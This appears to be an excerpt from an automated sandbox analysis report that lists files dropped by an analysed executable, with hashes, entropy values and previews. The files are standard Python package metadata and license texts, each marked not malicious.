                                                                                                                                                                                                                              SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2020
                                                                                                                                                                                                                              Entropy (8bit):5.0469065437932175
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:DfdqaaC3P1xe9okGw1w8wQwywbM0kvsJib0ts++kv0gMzvy0htC+heU01:DfdqaaC/12G2bHZokO+/36
                                                                                                                                                                                                                              MD5:18B352E2051962B9F65C33BC651426BF
                                                                                                                                                                                                                              SHA1:3DD8D93CF7695D1C9D7574751AB5B0DEE5DD7F9A
                                                                                                                                                                                                                              SHA-256:8215C54EAD77D9DC5A108A25C6BDC72B5999AA6F62C9499A440359412AFA5A51
                                                                                                                                                                                                                              SHA-512:D966BC2899079C0D9AC763C96EA59A550E00A54BDCEEB6D96B0A8CAA9F6A1C408E7E3946915432978EDE9EDF669EEC68035A55B094B69671A28428458760D99E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: backports.tarfile.Version: 1.2.0.Summary: Backport of CPython tarfile module.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/backports.tarfile.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Provides-Extra: testing.Requires-Dist: pytest !=8.1.*,>=6 ; extra == 'testing'.Requires-Dist: pytest-checkdocs >=2.4 ; extra == 'testing'.Requires-Dist: pytest-cov ; extra == 'testing
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1360
                                                                                                                                                                                                                              Entropy (8bit):5.753738299642538
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:U6rn/2zDJ6rvbqfuG6rJnB6rU6rEsJYB6rXamx6rlCHmTKjaQliwxJlp5DQljQls:NnuXIzUurJwN5JjfAlqYK9liSlp5DQlP
                                                                                                                                                                                                                              MD5:CF347AE8E31132435B127226F358F8CD
                                                                                                                                                                                                                              SHA1:2C857B300638FF291651234BBB2C077BEEF494E4
                                                                                                                                                                                                                              SHA-256:258A1F1C849E1175069A55A5D6CE357AFDD04E34CD5DE27093E4ACEC7A9D2CE1
                                                                                                                                                                                                                              SHA-512:2A46C7FDFA2F9883BB1D761646B33BE9CE7B07280A5BF38992C1C84AB0449944EB0CAF34620CCC82DDBBC193F0D54AE67797D97863F70CA0C24EE55A3B401F9C
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:backports.tarfile-1.2.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..backports.tarfile-1.2.0.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..backports.tarfile-1.2.0.dist-info/METADATA,sha256=ghXFTq132dxaEIolxr3HK1mZqm9iyUmaRANZQSr6WlE,2020..backports.tarfile-1.2.0.dist-info/RECORD,,..backports.tarfile-1.2.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..backports.tarfile-1.2.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..backports.tarfile-1.2.0.dist-info/top_level.txt,sha256=cGjaLMOoBR1FK0ApojtzWVmViTtJ7JGIK_HwXiEsvtU,10..backports/__init__.py,sha256=iOEMwnlORWezdO8-2vxBIPSR37D7JGjluZ8f55vzxls,81..backports/__pycache__/__init__.cpython-312.pyc,,..backports/tarfile/__init__.py,sha256=Pwf2qUIfB0SolJPCKcx3vz3UEu_aids4g4sAfxy94qg,108491..backports/tarfile/__main__.py,sha256=Yw2oGT1afrz2eBskzdPYL8ReB_3liApmhFkN2EbDmc4,59..backports/tarfile/__pycache__/__init__.cpython-312.pyc,,..back
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):10
                                                                                                                                                                                                                              Entropy (8bit):3.321928094887362
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:21v:ev
                                                                                                                                                                                                                              MD5:9BA458821AD258B6EF62B47E91302982
                                                                                                                                                                                                                              SHA1:9EDB9E6BA5C4001CE2FCCF328739292404EA9604
                                                                                                                                                                                                                              SHA-256:7068DA2CC3A8051D452B4029A23B73595995893B49EC91882BF1F05E212CBED5
                                                                                                                                                                                                                              SHA-512:3A296E5DADD5B406330BA088BFED33BE6960F8FF42DB6651E185FF14F2272FC819EF520D1A15BC40DA4E20B9CA0E5D79170EDF33F3D50937C7FBEDB338CAC730
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:backports.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11358
                                                                                                                                                                                                                              Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                                              MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                                              SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                                              SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                                              SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4648
                                                                                                                                                                                                                              Entropy (8bit):5.006900644756252
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Dx2ZSaCSmS8R902Vpnu386eLQ9Ac+fFZpDN00x2jZ2SBXZJSwTE:9Smzf02Vpnu386mQ9B+TP0vJHJSwTE
                                                                                                                                                                                                                              MD5:98ABEAACC0E0E4FC385DFF67B607071A
                                                                                                                                                                                                                              SHA1:E8C830D8B0942300C7C87B3B8FD15EA1396E07BD
                                                                                                                                                                                                                              SHA-256:6A7B90EFFEE1E09D5B484CDF7232016A43E2D9CC9543BCBB8E494B1EC05E1F59
                                                                                                                                                                                                                              SHA-512:F1D59046FFA5B0083A5259CEB03219CCDB8CC6AAC6247250CBD83E70F080784391FCC303F7630E1AD40E5CCF5041A57CB9B68ADEFEC1EBC6C31FCF7FFC65E9B7
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: importlib_metadata.Version: 8.0.0.Summary: Read metadata from Python packages.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/python/importlib_metadata.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: zipp >=0.5.Requires-Dist: typing-extensions >=3.6.4 ; python_version < "3.8".Provides-Extra: doc.Requires-Dist: sphinx >=3.5 ; extra == 'doc'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'doc'.Requires-Dist: rst.linker >=1.9 ; extra == 'doc'.Requires-Dist: furo ; extra == 'doc'.Requires-Dist: sphinx-lint ; extra == 'doc'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'doc'.Provides-Extra: perf.Requires-D
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2518
                                                                                                                                                                                                                              Entropy (8bit):5.6307766747793275
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:UnuXTg06U5J/Vw9l/gfNX7/XzBk9pvJq/fwJOfYrBfnJ/V0XJnzN/3WJV:bXzP/EgdzzBkDJsoIYrBfJ/CXNz9qV
                                                                                                                                                                                                                              MD5:EB513CAFA5226DDA7D54AFDCC9AD8A74
                                                                                                                                                                                                                              SHA1:B394C7AEC158350BAF676AE3197BEF4D7158B31C
                                                                                                                                                                                                                              SHA-256:0D8D3C6EEB9EBBE86CAC7D60861552433C329DA9EA51248B61D02BE2E5E64030
                                                                                                                                                                                                                              SHA-512:A0017CFAFF47FDA6067E3C31775FACEE4728C3220C2D4BD70DEF328BD20AA71A343E39DA15CD6B406F62311894C518DFCF5C8A4AE6F853946F26A4B4E767924E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:importlib_metadata-8.0.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_metadata-8.0.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_metadata-8.0.0.dist-info/METADATA,sha256=anuQ7_7h4J1bSEzfcjIBakPi2cyVQ7y7jklLHsBeH1k,4648..importlib_metadata-8.0.0.dist-info/RECORD,,..importlib_metadata-8.0.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_metadata-8.0.0.dist-info/WHEEL,sha256=mguMlWGMX-VHnMpKOjjQidIo1ssRlCFu4a4mBpz1s2M,91..importlib_metadata-8.0.0.dist-info/top_level.txt,sha256=CO3fD9yylANiXkrMo4qHLV_mqXL2sC5JFKgt1yWAT-A,19..importlib_metadata/__init__.py,sha256=tZNB-23h8Bixi9uCrQqj9Yf0aeC--Josdy3IZRIQeB0,33798..importlib_metadata/__pycache__/__init__.cpython-312.pyc,,..importlib_metadata/__pycache__/_adapters.cpython-312.pyc,,..importlib_metadata/__pycache__/_collections.cpython-312.pyc,,..importlib_metadata/__pycache__/_compat.cpython-312.pyc,,..importlib_metadata/__pycac
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):91
                                                                                                                                                                                                                              Entropy (8bit):4.687870576189661
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeXMRYFAVLMvhRRP+tPCCfA5S:RtC1VLMvhjWBBf
                                                                                                                                                                                                                              MD5:7D09837492494019EA51F4E97823D79F
                                                                                                                                                                                                                              SHA1:7829B4324BB542799494131A270EC3BDAD4DEDEF
                                                                                                                                                                                                                              SHA-256:9A0B8C95618C5FE5479CCA4A3A38D089D228D6CB1194216EE1AE26069CF5B363
                                                                                                                                                                                                                              SHA-512:A0063220ECDD22C3E735ACFF6DE559ACF3AC4C37B81D37633975A22A28B026F1935CD1957C0FF7D2ECC8B7F83F250310795EECC5273B893FFAB115098F7B9C38
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: setuptools (70.1.1).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):19
                                                                                                                                                                                                                              Entropy (8bit):3.536886723742169
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:JSej0EBERG:50o4G
                                                                                                                                                                                                                              MD5:A24465F7850BA59507BF86D89165525C
                                                                                                                                                                                                                              SHA1:4E61F9264DE74783B5924249BCFE1B06F178B9AD
                                                                                                                                                                                                                              SHA-256:08EDDF0FDCB29403625E4ACCA38A872D5FE6A972F6B02E4914A82DD725804FE0
                                                                                                                                                                                                                              SHA-512:ECF1F6B777970F5257BDDD353305447083008CEBD8E5A27C3D1DA9C7BDC3F9BF3ABD6881265906D6D5E11992653185C04A522F4DB5655FF75EEDB766F93D5D48
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:importlib_metadata.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11358
                                                                                                                                                                                                                              Entropy (8bit):4.4267168336581415
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:nU6G5KXSD9VYUKhu1JVF9hFGvV/QiGkS594drFjuHYx5dvTrLh3kTSEn7HbHR:U9vlKM1zJlFvmNz5VrlkTS07Ht
                                                                                                                                                                                                                              MD5:3B83EF96387F14655FC854DDC3C6BD57
                                                                                                                                                                                                                              SHA1:2B8B815229AA8A61E483FB4BA0588B8B6C491890
                                                                                                                                                                                                                              SHA-256:CFC7749B96F63BD31C3C42B5C471BF756814053E847C10F3EB003417BC523D30
                                                                                                                                                                                                                              SHA-512:98F6B79B778F7B0A15415BD750C3A8A097D650511CB4EC8115188E115C47053FE700F578895C097051C9BC3DFB6197C2B13A15DE203273E1A3218884F86E90E8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:. Apache License. Version 2.0, January 2004. http://www.apache.org/licenses/.. TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION.. 1. Definitions... "License" shall mean the terms and conditions for use, reproduction,. and distribution as defined by Sections 1 through 9 of this document... "Licensor" shall mean the copyright owner or entity authorized by. the copyright owner that is granting the License... "Legal Entity" shall mean the union of the acting entity and all. other entities that control, are controlled by, or are under common. control with that entity. For the purposes of this definition,. "control" means (i) the power, direct or indirect, to cause the. direction or management of such entity, whether by contract or. otherwise, or (ii) ownership of fifty percent (50%) or more of the. outstanding shares, or (iii) beneficial own
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3944
                                                                                                                                                                                                                              Entropy (8bit):5.015824473130961
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:DHxQuiTaCP1nTGDbHRbnzQWHaiQq+fT5lWp8sSwTW:2PP9GDbHRbnp+rapPSwTW
                                                                                                                                                                                                                              MD5:C3EB48CD13B50DDED7CD524E1E9DD4CE
                                                                                                                                                                                                                              SHA1:7C9B0B50D0E667825DAB09902AD8376A5F2945B6
                                                                                                                                                                                                                              SHA-256:83878CD8BB8BD0E89971454D0F4AB00C9529136F603AFB4EDC148F5D36CEF459
                                                                                                                                                                                                                              SHA-512:056EBC250B7E82F91B5C5E96B1293F24D5E917E06846A9716A4D05B47C30FEB3781E439C77876CF7D8620BEBAA4A253039CA8DF122283DE304992E340F4DE8BF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Metadata-Version: 2.1.Name: importlib_resources.Version: 6.4.0.Summary: Read resources from Python packages.Home-page: https://github.com/python/importlib_resources.Author: Barry Warsaw.Author-email: barry@python.org.Project-URL: Documentation, https://importlib-resources.readthedocs.io/.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: Apache Software License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.License-File: LICENSE.Requires-Dist: zipp >=3.1.0 ; python_version < "3.10".Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: sphinx <7.2.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; ext
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:CSV text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7620
                                                                                                                                                                                                                              Entropy (8bit):5.560551717923108
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:lX7qdX7ZgsP7JtILSVAn5V26+XuVYmBXx:lX7wX7ZBP7ELSVAni6+iBh
                                                                                                                                                                                                                              MD5:67F5E26385B6BDCF2236A005A2D2BA32
                                                                                                                                                                                                                              SHA1:3DCD8685638A90D121FD484138AFCAC9775E5D66
                                                                                                                                                                                                                              SHA-256:967DD56FEEA143F1D2C4E98AC1F937C055E61C9AA0425146D55F7AD7C82510FA
                                                                                                                                                                                                                              SHA-512:30B5812E930A00A476E570EBCC4611D54C911A8B1E4646949A887F551FC5ABDC933311A554B197C602F0DA7626DFE8877A3F267EFBC6D724E24A3E9B5FCC2E30
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:importlib_resources-6.4.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..importlib_resources-6.4.0.dist-info/LICENSE,sha256=z8d0m5b2O9McPEK1xHG_dWgUBT6EfBDz6wA0F7xSPTA,11358..importlib_resources-6.4.0.dist-info/METADATA,sha256=g4eM2LuL0OiZcUVND0qwDJUpE29gOvtO3BSPXTbO9Fk,3944..importlib_resources-6.4.0.dist-info/RECORD,,..importlib_resources-6.4.0.dist-info/REQUESTED,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..importlib_resources-6.4.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..importlib_resources-6.4.0.dist-info/top_level.txt,sha256=fHIjHU1GZwAjvcydpmUnUrTnbvdiWjG4OEVZK8by0TQ,20..importlib_resources/__init__.py,sha256=uyp1kzYR6SawQBsqlyaXXfIxJx4Z2mM8MjmZn8qq2Gk,505..importlib_resources/__pycache__/__init__.cpython-312.pyc,,..importlib_resources/__pycache__/_adapters.cpython-312.pyc,,..importlib_resources/__pycache__/_common.cpython-312.pyc,,..importlib_resources/__pycache__/_itertools.cpython-312.pyc,,..importlib_resource
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):92
                                                                                                                                                                                                                              Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                              MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                              SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                              SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                              SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):20
                                                                                                                                                                                                                              Entropy (8bit):3.6841837197791887
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:JSe8AW6D:3fD
                                                                                                                                                                                                                              MD5:0613840F692BD9E064FEDD915DFD477A
                                                                                                                                                                                                                              SHA1:64DF38B36F541BA1714C15FCA1A9CA8C94EF2DAA
                                                                                                                                                                                                                              SHA-256:7C72231D4D46670023BDCC9DA6652752B4E76EF7625A31B83845592BC6F2D134
                                                                                                                                                                                                                              SHA-512:78AA888C24B3468C94FCB8EB882561D4B6F19A0537A4CFDDDFF94ED8A4BAFE8DF0C2B620E70B57A61E8BA3F877856DB9ADA548DFCA8CAE86D4C3C525A4E9B7EB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:importlib_resources.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4
                                                                                                                                                                                                                              Entropy (8bit):1.5
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:Mn:M
                                                                                                                                                                                                                              MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                              SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                              SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                              SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:pip.
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1023
                                                                                                                                                                                                                              Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                              Encrypted:false
